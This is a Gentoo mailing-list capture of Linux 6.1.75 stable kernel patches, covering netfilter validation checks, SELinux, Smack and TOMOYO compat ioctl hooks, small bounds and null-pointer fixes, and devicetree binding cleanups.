+index 353c090f88917..ba7bcce724efd 100644
+--- a/net/netfilter/nft_nat.c
++++ b/net/netfilter/nft_nat.c
+@@ -142,6 +142,11 @@ static int nft_nat_validate(const struct nft_ctx *ctx,
+ 	struct nft_nat *priv = nft_expr_priv(expr);
+ 	int err;
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	err = nft_chain_validate_dependency(ctx->chain, NFT_CHAIN_T_NAT);
+ 	if (err < 0)
+ 		return err;
+diff --git a/net/netfilter/nft_rt.c b/net/netfilter/nft_rt.c
+index 71931ec917219..7d21e16499bfa 100644
+--- a/net/netfilter/nft_rt.c
++++ b/net/netfilter/nft_rt.c
+@@ -166,6 +166,11 @@ static int nft_rt_validate(const struct nft_ctx *ctx, const struct nft_expr *exp
+ 	const struct nft_rt *priv = nft_expr_priv(expr);
+ 	unsigned int hooks;
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	switch (priv->key) {
+ 	case NFT_RT_NEXTHOP4:
+ 	case NFT_RT_NEXTHOP6:
+diff --git a/net/netfilter/nft_socket.c b/net/netfilter/nft_socket.c
+index 777561b71fcbd..f28324fd8d718 100644
+--- a/net/netfilter/nft_socket.c
++++ b/net/netfilter/nft_socket.c
+@@ -242,6 +242,11 @@ static int nft_socket_validate(const struct nft_ctx *ctx,
+ 			       const struct nft_expr *expr,
+ 			       const struct nft_data **data)
+ {
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	return nft_chain_validate_hooks(ctx->chain,
+ 					(1 << NF_INET_PRE_ROUTING) |
+ 					(1 << NF_INET_LOCAL_IN) |
+diff --git a/net/netfilter/nft_synproxy.c b/net/netfilter/nft_synproxy.c
+index 6cf9a04fbfe23..a450f28a5ef60 100644
+--- a/net/netfilter/nft_synproxy.c
++++ b/net/netfilter/nft_synproxy.c
+@@ -186,7 +186,6 @@ static int nft_synproxy_do_init(const struct nft_ctx *ctx,
+ 		break;
+ #endif
+ 	case NFPROTO_INET:
+-	case NFPROTO_BRIDGE:
+ 		err = nf_synproxy_ipv4_init(snet, ctx->net);
+ 		if (err)
+ 			goto nf_ct_failure;
+@@ -219,7 +218,6 @@ static void nft_synproxy_do_destroy(const struct nft_ctx *ctx)
+ 		break;
+ #endif
+ 	case NFPROTO_INET:
+-	case NFPROTO_BRIDGE:
+ 		nf_synproxy_ipv4_fini(snet, ctx->net);
+ 		nf_synproxy_ipv6_fini(snet, ctx->net);
+ 		break;
+@@ -253,6 +251,11 @@ static int nft_synproxy_validate(const struct nft_ctx *ctx,
+ 				 const struct nft_expr *expr,
+ 				 const struct nft_data **data)
+ {
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	return nft_chain_validate_hooks(ctx->chain, (1 << NF_INET_LOCAL_IN) |
+ 						    (1 << NF_INET_FORWARD));
+ }
+diff --git a/net/netfilter/nft_tproxy.c b/net/netfilter/nft_tproxy.c
+index 62da25ad264bc..adb50c39572e2 100644
+--- a/net/netfilter/nft_tproxy.c
++++ b/net/netfilter/nft_tproxy.c
+@@ -316,6 +316,11 @@ static int nft_tproxy_validate(const struct nft_ctx *ctx,
+ 			       const struct nft_expr *expr,
+ 			       const struct nft_data **data)
+ {
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	return nft_chain_validate_hooks(ctx->chain, 1 << NF_INET_PRE_ROUTING);
+ }
+ 
+diff --git a/net/netfilter/nft_xfrm.c b/net/netfilter/nft_xfrm.c
+index 1c5343c936a8a..30259846c3525 100644
+--- a/net/netfilter/nft_xfrm.c
++++ b/net/netfilter/nft_xfrm.c
+@@ -235,6 +235,11 @@ static int nft_xfrm_validate(const struct nft_ctx *ctx, const struct nft_expr *e
+ 	const struct nft_xfrm *priv = nft_expr_priv(expr);
+ 	unsigned int hooks;
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	switch (priv->dir) {
+ 	case XFRM_POLICY_IN:
+ 		hooks = (1 << NF_INET_FORWARD) |
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index cb833302270a6..6857a4965fe87 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -374,7 +374,7 @@ static void netlink_skb_destructor(struct sk_buff *skb)
+ 	if (is_vmalloc_addr(skb->head)) {
+ 		if (!skb->cloned ||
+ 		    !atomic_dec_return(&(skb_shinfo(skb)->dataref)))
+-			vfree(skb->head);
++			vfree_atomic(skb->head);
+ 
+ 		skb->head = NULL;
+ 	}
+diff --git a/net/rds/af_rds.c b/net/rds/af_rds.c
+index 3ff6995244e5e..d107f7605db4f 100644
+--- a/net/rds/af_rds.c
++++ b/net/rds/af_rds.c
+@@ -419,7 +419,7 @@ static int rds_recv_track_latency(struct rds_sock *rs, sockptr_t optval,
+ 
+ 	rs->rs_rx_traces = trace.rx_traces;
+ 	for (i = 0; i < rs->rs_rx_traces; i++) {
+-		if (trace.rx_trace_pos[i] > RDS_MSG_RX_DGRAM_TRACE_MAX) {
++		if (trace.rx_trace_pos[i] >= RDS_MSG_RX_DGRAM_TRACE_MAX) {
+ 			rs->rs_rx_traces = 0;
+ 			return -EFAULT;
+ 		}
+diff --git a/net/smc/smc_diag.c b/net/smc/smc_diag.c
+index 801044e7d1949..7a907186a33ae 100644
+--- a/net/smc/smc_diag.c
++++ b/net/smc/smc_diag.c
+@@ -163,7 +163,7 @@ static int __smc_diag_dump(struct sock *sk, struct sk_buff *skb,
+ 	}
+ 	if (smc_conn_lgr_valid(&smc->conn) && smc->conn.lgr->is_smcd &&
+ 	    (req->diag_ext & (1 << (SMC_DIAG_DMBINFO - 1))) &&
+-	    !list_empty(&smc->conn.lgr->list)) {
++	    !list_empty(&smc->conn.lgr->list) && smc->conn.rmb_desc) {
+ 		struct smc_connection *conn = &smc->conn;
+ 		struct smcd_diag_dmbinfo dinfo;
+ 
+diff --git a/scripts/get_abi.pl b/scripts/get_abi.pl
+index 0ffd5531242aa..408bfd0216da0 100755
+--- a/scripts/get_abi.pl
++++ b/scripts/get_abi.pl
+@@ -98,7 +98,7 @@ sub parse_abi {
+ 	$name =~ s,.*/,,;
+ 
+ 	my $fn = $file;
+-	$fn =~ s,Documentation/ABI/,,;
++	$fn =~ s,.*Documentation/ABI/,,;
+ 
+ 	my $nametag = "File $fn";
+ 	$data{$nametag}->{what} = "File $name";
+diff --git a/security/security.c b/security/security.c
+index 5fa286ae9908d..fc15b963e1028 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -1569,6 +1569,24 @@ int security_file_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
+ }
+ EXPORT_SYMBOL_GPL(security_file_ioctl);
+ 
++/**
++ * security_file_ioctl_compat() - Check if an ioctl is allowed in compat mode
++ * @file: associated file
++ * @cmd: ioctl cmd
++ * @arg: ioctl arguments
++ *
++ * Compat version of security_file_ioctl() that correctly handles 32-bit
++ * processes running on 64-bit kernels.
++ *
++ * Return: Returns 0 if permission is granted.
++ */
++int security_file_ioctl_compat(struct file *file, unsigned int cmd,
++			       unsigned long arg)
++{
++	return call_int_hook(file_ioctl_compat, 0, file, cmd, arg);
++}
++EXPORT_SYMBOL_GPL(security_file_ioctl_compat);
++
+ static inline unsigned long mmap_prot(struct file *file, unsigned long prot)
+ {
+ 	/*
+diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
+index d45e9fa74e62d..78f3da39b0319 100644
+--- a/security/selinux/hooks.c
++++ b/security/selinux/hooks.c
+@@ -3718,6 +3718,33 @@ static int selinux_file_ioctl(struct file *file, unsigned int cmd,
+ 	return error;
+ }
+ 
++static int selinux_file_ioctl_compat(struct file *file, unsigned int cmd,
++			      unsigned long arg)
++{
++	/*
++	 * If we are in a 64-bit kernel running 32-bit userspace, we need to
++	 * make sure we don't compare 32-bit flags to 64-bit flags.
++	 */
++	switch (cmd) {
++	case FS_IOC32_GETFLAGS:
++		cmd = FS_IOC_GETFLAGS;
++		break;
++	case FS_IOC32_SETFLAGS:
++		cmd = FS_IOC_SETFLAGS;
++		break;
++	case FS_IOC32_GETVERSION:
++		cmd = FS_IOC_GETVERSION;
++		break;
++	case FS_IOC32_SETVERSION:
++		cmd = FS_IOC_SETVERSION;
++		break;
++	default:
++		break;
++	}
++
++	return selinux_file_ioctl(file, cmd, arg);
++}
++
+ static int default_noexec __ro_after_init;
+ 
+ static int file_map_prot_check(struct file *file, unsigned long prot, int shared)
+@@ -7135,6 +7162,7 @@ static struct security_hook_list selinux_hooks[] __lsm_ro_after_init = {
+ 	LSM_HOOK_INIT(file_permission, selinux_file_permission),
+ 	LSM_HOOK_INIT(file_alloc_security, selinux_file_alloc_security),
+ 	LSM_HOOK_INIT(file_ioctl, selinux_file_ioctl),
++	LSM_HOOK_INIT(file_ioctl_compat, selinux_file_ioctl_compat),
+ 	LSM_HOOK_INIT(mmap_file, selinux_mmap_file),
+ 	LSM_HOOK_INIT(mmap_addr, selinux_mmap_addr),
+ 	LSM_HOOK_INIT(file_mprotect, selinux_file_mprotect),
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index cd6a03e945eb7..fbadc61feedd1 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -4905,6 +4905,7 @@ static struct security_hook_list smack_hooks[] __lsm_ro_after_init = {
+ 
+ 	LSM_HOOK_INIT(file_alloc_security, smack_file_alloc_security),
+ 	LSM_HOOK_INIT(file_ioctl, smack_file_ioctl),
++	LSM_HOOK_INIT(file_ioctl_compat, smack_file_ioctl),
+ 	LSM_HOOK_INIT(file_lock, smack_file_lock),
+ 	LSM_HOOK_INIT(file_fcntl, smack_file_fcntl),
+ 	LSM_HOOK_INIT(mmap_file, smack_mmap_file),
+diff --git a/security/tomoyo/tomoyo.c b/security/tomoyo/tomoyo.c
+index 71e82d855ebfc..fb599401bc7d2 100644
+--- a/security/tomoyo/tomoyo.c
++++ b/security/tomoyo/tomoyo.c
+@@ -555,6 +555,7 @@ static struct security_hook_list tomoyo_hooks[] __lsm_ro_after_init = {
+ 	LSM_HOOK_INIT(path_rename, tomoyo_path_rename),
+ 	LSM_HOOK_INIT(inode_getattr, tomoyo_inode_getattr),
+ 	LSM_HOOK_INIT(file_ioctl, tomoyo_file_ioctl),
++	LSM_HOOK_INIT(file_ioctl_compat, tomoyo_file_ioctl),
+ 	LSM_HOOK_INIT(path_chmod, tomoyo_path_chmod),
+ 	LSM_HOOK_INIT(path_chown, tomoyo_path_chown),
+ 	LSM_HOOK_INIT(path_chroot, tomoyo_path_chroot),
+diff --git a/tools/testing/selftests/drivers/net/netdevsim/udp_tunnel_nic.sh b/tools/testing/selftests/drivers/net/netdevsim/udp_tunnel_nic.sh
+index 1b08e042cf942..185b02d2d4cd1 100755
+--- a/tools/testing/selftests/drivers/net/netdevsim/udp_tunnel_nic.sh
++++ b/tools/testing/selftests/drivers/net/netdevsim/udp_tunnel_nic.sh
+@@ -269,6 +269,7 @@ for port in 0 1; do
+ 	echo 1 > $NSIM_DEV_SYS/new_port
+     fi
+     NSIM_NETDEV=`get_netdev_name old_netdevs`
++    ifconfig $NSIM_NETDEV up
+ 
+     msg="new NIC device created"
+     exp0=( 0 0 0 0 )
+@@ -430,6 +431,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     overflow_table0 "overflow NIC table"
+@@ -487,6 +489,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     overflow_table0 "overflow NIC table"
+@@ -543,6 +546,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     overflow_table0 "destroy NIC"
+@@ -572,6 +576,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     msg="create VxLANs v6"
+@@ -632,6 +637,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     echo 110 > $NSIM_DEV_DFS/ports/$port/udp_ports_inject_error
+@@ -687,6 +693,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     msg="create VxLANs v6"
+@@ -746,6 +753,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     msg="create VxLANs v6"
+@@ -876,6 +884,7 @@ msg="re-add a port"
+ 
+ echo 2 > $NSIM_DEV_SYS/del_port
+ echo 2 > $NSIM_DEV_SYS/new_port
++NSIM_NETDEV=`get_netdev_name old_netdevs`
+ check_tables
+ 
+ msg="replace VxLAN in overflow table"


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-26  0:09 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-26  0:09 UTC (permalink / raw
  To: gentoo-commits

commit:     4ff558e4765fc0dcce52c13d5bfca05ae404063e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jan 26 00:09:15 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jan 26 00:09:15 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=4ff558e4

Linux patch 6.1.75

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1074_linux-6.1.75.patch | 15017 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 15021 insertions(+)

diff --git a/0000_README b/0000_README
index 32442528..8ba5f5b4 100644
--- a/0000_README
+++ b/0000_README
@@ -339,6 +339,10 @@ Patch:  1073_linux-6.1.74.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.74
 
+Patch:  1074_linux-6.1.75.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.75
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1074_linux-6.1.75.patch b/1074_linux-6.1.75.patch
new file mode 100644
index 00000000..467e3c0a
--- /dev/null
+++ b/1074_linux-6.1.75.patch
@@ -0,0 +1,15017 @@
+diff --git a/Documentation/devicetree/bindings/gpio/xlnx,gpio-xilinx.yaml b/Documentation/devicetree/bindings/gpio/xlnx,gpio-xilinx.yaml
+index f333ee2288e76..11ae8ec3c7394 100644
+--- a/Documentation/devicetree/bindings/gpio/xlnx,gpio-xilinx.yaml
++++ b/Documentation/devicetree/bindings/gpio/xlnx,gpio-xilinx.yaml
+@@ -126,7 +126,7 @@ examples:
+   - |
+     #include <dt-bindings/interrupt-controller/arm-gic.h>
+ 
+-        gpio@e000a000 {
++            gpio@a0020000 {
+             compatible = "xlnx,xps-gpio-1.00.a";
+             reg = <0xa0020000 0x10000>;
+             #gpio-cells = <2>;
+diff --git a/Documentation/devicetree/bindings/media/mediatek,mdp3-rdma.yaml b/Documentation/devicetree/bindings/media/mediatek,mdp3-rdma.yaml
+index 9cfc0c7d23e06..46730687c6624 100644
+--- a/Documentation/devicetree/bindings/media/mediatek,mdp3-rdma.yaml
++++ b/Documentation/devicetree/bindings/media/mediatek,mdp3-rdma.yaml
+@@ -61,6 +61,9 @@ properties:
+       - description: used for 1st data pipe from RDMA
+       - description: used for 2nd data pipe from RDMA
+ 
++  '#dma-cells':
++    const: 1
++
+ required:
+   - compatible
+   - reg
+@@ -70,6 +73,7 @@ required:
+   - clocks
+   - iommus
+   - mboxes
++  - '#dma-cells'
+ 
+ additionalProperties: false
+ 
+@@ -80,16 +84,17 @@ examples:
+     #include <dt-bindings/power/mt8183-power.h>
+     #include <dt-bindings/memory/mt8183-larb-port.h>
+ 
+-    mdp3_rdma0: mdp3-rdma0@14001000 {
+-      compatible = "mediatek,mt8183-mdp3-rdma";
+-      reg = <0x14001000 0x1000>;
+-      mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x1000 0x1000>;
+-      mediatek,gce-events = <CMDQ_EVENT_MDP_RDMA0_SOF>,
+-                            <CMDQ_EVENT_MDP_RDMA0_EOF>;
+-      power-domains = <&spm MT8183_POWER_DOMAIN_DISP>;
+-      clocks = <&mmsys CLK_MM_MDP_RDMA0>,
+-               <&mmsys CLK_MM_MDP_RSZ1>;
+-      iommus = <&iommu>;
+-      mboxes = <&gce 20 CMDQ_THR_PRIO_LOWEST>,
+-               <&gce 21 CMDQ_THR_PRIO_LOWEST>;
++    dma-controller@14001000 {
++        compatible = "mediatek,mt8183-mdp3-rdma";
++        reg = <0x14001000 0x1000>;
++        mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x1000 0x1000>;
++        mediatek,gce-events = <CMDQ_EVENT_MDP_RDMA0_SOF>,
++                              <CMDQ_EVENT_MDP_RDMA0_EOF>;
++        power-domains = <&spm MT8183_POWER_DOMAIN_DISP>;
++        clocks = <&mmsys CLK_MM_MDP_RDMA0>,
++                 <&mmsys CLK_MM_MDP_RSZ1>;
++        iommus = <&iommu>;
++        mboxes = <&gce 20 CMDQ_THR_PRIO_LOWEST>,
++                 <&gce 21 CMDQ_THR_PRIO_LOWEST>;
++        #dma-cells = <1>;
+     };
+diff --git a/Documentation/devicetree/bindings/media/mediatek,mdp3-wrot.yaml b/Documentation/devicetree/bindings/media/mediatek,mdp3-wrot.yaml
+index 0baa77198fa21..64ea98aa05928 100644
+--- a/Documentation/devicetree/bindings/media/mediatek,mdp3-wrot.yaml
++++ b/Documentation/devicetree/bindings/media/mediatek,mdp3-wrot.yaml
+@@ -50,6 +50,9 @@ properties:
+   iommus:
+     maxItems: 1
+ 
++  '#dma-cells':
++    const: 1
++
+ required:
+   - compatible
+   - reg
+@@ -58,6 +61,7 @@ required:
+   - power-domains
+   - clocks
+   - iommus
++  - '#dma-cells'
+ 
+ additionalProperties: false
+ 
+@@ -68,13 +72,14 @@ examples:
+     #include <dt-bindings/power/mt8183-power.h>
+     #include <dt-bindings/memory/mt8183-larb-port.h>
+ 
+-    mdp3_wrot0: mdp3-wrot0@14005000 {
+-      compatible = "mediatek,mt8183-mdp3-wrot";
+-      reg = <0x14005000 0x1000>;
+-      mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x5000 0x1000>;
+-      mediatek,gce-events = <CMDQ_EVENT_MDP_WROT0_SOF>,
+-                            <CMDQ_EVENT_MDP_WROT0_EOF>;
+-      power-domains = <&spm MT8183_POWER_DOMAIN_DISP>;
+-      clocks = <&mmsys CLK_MM_MDP_WROT0>;
+-      iommus = <&iommu>;
++    dma-controller@14005000 {
++        compatible = "mediatek,mt8183-mdp3-wrot";
++        reg = <0x14005000 0x1000>;
++        mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x5000 0x1000>;
++        mediatek,gce-events = <CMDQ_EVENT_MDP_WROT0_SOF>,
++                              <CMDQ_EVENT_MDP_WROT0_EOF>;
++        power-domains = <&spm MT8183_POWER_DOMAIN_DISP>;
++        clocks = <&mmsys CLK_MM_MDP_WROT0>;
++        iommus = <&iommu>;
++        #dma-cells = <1>;
+     };
+diff --git a/Documentation/devicetree/bindings/media/rockchip-isp1.yaml b/Documentation/devicetree/bindings/media/rockchip-isp1.yaml
+index b3661d7d43572..2a0ad332f5ced 100644
+--- a/Documentation/devicetree/bindings/media/rockchip-isp1.yaml
++++ b/Documentation/devicetree/bindings/media/rockchip-isp1.yaml
+@@ -90,15 +90,16 @@ properties:
+         description: connection point for input on the parallel interface
+ 
+         properties:
+-          bus-type:
+-            enum: [5, 6]
+-
+           endpoint:
+             $ref: video-interfaces.yaml#
+             unevaluatedProperties: false
+ 
+-        required:
+-          - bus-type
++            properties:
++              bus-type:
++                enum: [5, 6]
++
++            required:
++              - bus-type
+ 
+     anyOf:
+       - required:
+diff --git a/Documentation/driver-api/pci/p2pdma.rst b/Documentation/driver-api/pci/p2pdma.rst
+index 44deb52beeb47..d0b241628cf13 100644
+--- a/Documentation/driver-api/pci/p2pdma.rst
++++ b/Documentation/driver-api/pci/p2pdma.rst
+@@ -83,19 +83,9 @@ this to include other types of resources like doorbells.
+ Client Drivers
+ --------------
+ 
+-A client driver typically only has to conditionally change its DMA map
+-routine to use the mapping function :c:func:`pci_p2pdma_map_sg()` instead
+-of the usual :c:func:`dma_map_sg()` function. Memory mapped in this
+-way does not need to be unmapped.
+-
+-The client may also, optionally, make use of
+-:c:func:`is_pci_p2pdma_page()` to determine when to use the P2P mapping
+-functions and when to use the regular mapping functions. In some
+-situations, it may be more appropriate to use a flag to indicate a
+-given request is P2P memory and map appropriately. It is important to
+-ensure that struct pages that back P2P memory stay out of code that
+-does not have support for them as other code may treat the pages as
+-regular memory which may not be appropriate.
++A client driver only has to use the mapping API :c:func:`dma_map_sg()`
++and :c:func:`dma_unmap_sg()` functions as usual, and the implementation
++will do the right thing for the P2P capable memory.
+ 
+ 
+ Orchestrator Drivers
+diff --git a/Makefile b/Makefile
+index 63125d1ffd9cf..7cd49d9eadbfc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 74
++SUBLEVEL = 75
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/qcom-apq8064.dtsi b/arch/arm/boot/dts/qcom-apq8064.dtsi
+index 4b57e9f5bc648..2b3927a829b70 100644
+--- a/arch/arm/boot/dts/qcom-apq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-apq8064.dtsi
+@@ -750,7 +750,7 @@
+ 
+ 				xoadc: xoadc@197 {
+ 					compatible = "qcom,pm8921-adc";
+-					reg = <197>;
++					reg = <0x197>;
+ 					interrupts-extended = <&pmicintc 78 IRQ_TYPE_EDGE_RISING>;
+ 					#address-cells = <2>;
+ 					#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/qcom-sdx65.dtsi b/arch/arm/boot/dts/qcom-sdx65.dtsi
+index ecb9171e4da5f..ebb78b489e638 100644
+--- a/arch/arm/boot/dts/qcom-sdx65.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx65.dtsi
+@@ -401,7 +401,7 @@
+ 			reg = <0x0c264000 0x1000>;
+ 		};
+ 
+-		spmi_bus: qcom,spmi@c440000 {
++		spmi_bus: spmi@c440000 {
+ 			compatible = "qcom,spmi-pmic-arb";
+ 			reg = <0xc440000 0xd00>,
+ 				<0xc600000 0x2000000>,
+diff --git a/arch/arm/boot/dts/stm32mp157a-dk1-scmi.dts b/arch/arm/boot/dts/stm32mp157a-dk1-scmi.dts
+index e539cc80bef81..942a6ca38d97e 100644
+--- a/arch/arm/boot/dts/stm32mp157a-dk1-scmi.dts
++++ b/arch/arm/boot/dts/stm32mp157a-dk1-scmi.dts
+@@ -11,7 +11,7 @@
+ 
+ / {
+ 	model = "STMicroelectronics STM32MP157A-DK1 SCMI Discovery Board";
+-	compatible = "st,stm32mp157a-dk1-scmi", "st,stm32mp157a-dk1", "st,stm32mp157";
++	compatible = "st,stm32mp157a-dk1-scmi", "st,stm32mp157";
+ 
+ 	reserved-memory {
+ 		optee@de000000 {
+diff --git a/arch/arm/boot/dts/stm32mp157c-dk2-scmi.dts b/arch/arm/boot/dts/stm32mp157c-dk2-scmi.dts
+index 97e4f94b0a24e..99c4ff1f5c214 100644
+--- a/arch/arm/boot/dts/stm32mp157c-dk2-scmi.dts
++++ b/arch/arm/boot/dts/stm32mp157c-dk2-scmi.dts
+@@ -11,7 +11,7 @@
+ 
+ / {
+ 	model = "STMicroelectronics STM32MP157C-DK2 SCMI Discovery Board";
+-	compatible = "st,stm32mp157c-dk2-scmi", "st,stm32mp157c-dk2", "st,stm32mp157";
++	compatible = "st,stm32mp157c-dk2-scmi", "st,stm32mp157";
+ 
+ 	reserved-memory {
+ 		optee@de000000 {
+diff --git a/arch/arm/boot/dts/stm32mp157c-ed1-scmi.dts b/arch/arm/boot/dts/stm32mp157c-ed1-scmi.dts
+index 9cf0a44d2f47e..21010458b36f5 100644
+--- a/arch/arm/boot/dts/stm32mp157c-ed1-scmi.dts
++++ b/arch/arm/boot/dts/stm32mp157c-ed1-scmi.dts
+@@ -11,7 +11,7 @@
+ 
+ / {
+ 	model = "STMicroelectronics STM32MP157C-ED1 SCMI eval daughter";
+-	compatible = "st,stm32mp157c-ed1-scmi", "st,stm32mp157c-ed1", "st,stm32mp157";
++	compatible = "st,stm32mp157c-ed1-scmi", "st,stm32mp157";
+ 
+ 	reserved-memory {
+ 		optee@fe000000 {
+diff --git a/arch/arm/boot/dts/stm32mp157c-ev1-scmi.dts b/arch/arm/boot/dts/stm32mp157c-ev1-scmi.dts
+index 3b9dd6f4ccc96..d376371499193 100644
+--- a/arch/arm/boot/dts/stm32mp157c-ev1-scmi.dts
++++ b/arch/arm/boot/dts/stm32mp157c-ev1-scmi.dts
+@@ -11,8 +11,7 @@
+ 
+ / {
+ 	model = "STMicroelectronics STM32MP157C-EV1 SCMI eval daughter on eval mother";
+-	compatible = "st,stm32mp157c-ev1-scmi", "st,stm32mp157c-ev1", "st,stm32mp157c-ed1",
+-		     "st,stm32mp157";
++	compatible = "st,stm32mp157c-ev1-scmi", "st,stm32mp157c-ed1", "st,stm32mp157";
+ 
+ 	reserved-memory {
+ 		optee@fe000000 {
+diff --git a/arch/arm/mach-davinci/Kconfig b/arch/arm/mach-davinci/Kconfig
+index c8cbd9a307914..672ffb0b5f3af 100644
+--- a/arch/arm/mach-davinci/Kconfig
++++ b/arch/arm/mach-davinci/Kconfig
+@@ -4,12 +4,14 @@ menuconfig ARCH_DAVINCI
+ 	bool "TI DaVinci"
+ 	depends on ARCH_MULTI_V5
+ 	depends on CPU_LITTLE_ENDIAN
++	select CPU_ARM926T
+ 	select DAVINCI_TIMER
+ 	select ZONE_DMA
+ 	select PM_GENERIC_DOMAINS if PM
+ 	select PM_GENERIC_DOMAINS_OF if PM && OF
+ 	select REGMAP_MMIO
+ 	select RESET_CONTROLLER
++	select PINCTRL
+ 	select PINCTRL_SINGLE
+ 
+ if ARCH_DAVINCI
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm.dtsi b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+index d583db18f74cc..7a410d73600b1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+@@ -1303,7 +1303,7 @@
+ 			assigned-clocks = <&clk IMX8MM_CLK_GPU3D_CORE>,
+ 					  <&clk IMX8MM_GPU_PLL_OUT>;
+ 			assigned-clock-parents = <&clk IMX8MM_GPU_PLL_OUT>;
+-			assigned-clock-rates = <0>, <1000000000>;
++			assigned-clock-rates = <0>, <800000000>;
+ 			power-domains = <&pgc_gpu>;
+ 		};
+ 
+@@ -1318,7 +1318,7 @@
+ 			assigned-clocks = <&clk IMX8MM_CLK_GPU2D_CORE>,
+ 					  <&clk IMX8MM_GPU_PLL_OUT>;
+ 			assigned-clock-parents = <&clk IMX8MM_GPU_PLL_OUT>;
+-			assigned-clock-rates = <0>, <1000000000>;
++			assigned-clock-rates = <0>, <800000000>;
+ 			power-domains = <&pgc_gpu>;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/hisilicon/hikey970-pmic.dtsi b/arch/arm64/boot/dts/hisilicon/hikey970-pmic.dtsi
+index 970047f2dabd5..c06e011a6c3ff 100644
+--- a/arch/arm64/boot/dts/hisilicon/hikey970-pmic.dtsi
++++ b/arch/arm64/boot/dts/hisilicon/hikey970-pmic.dtsi
+@@ -25,9 +25,6 @@
+ 			gpios = <&gpio28 0 0>;
+ 
+ 			regulators {
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+-
+ 				ldo3: ldo3 { /* HDMI */
+ 					regulator-name = "ldo3";
+ 					regulator-min-microvolt = <1500000>;
+diff --git a/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts b/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
+index 200f97e1c4c9c..37350e5fa253a 100644
+--- a/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
++++ b/arch/arm64/boot/dts/marvell/armada-3720-turris-mox.dts
+@@ -130,7 +130,7 @@
+ 		compatible = "microchip,mcp7940x";
+ 		reg = <0x6f>;
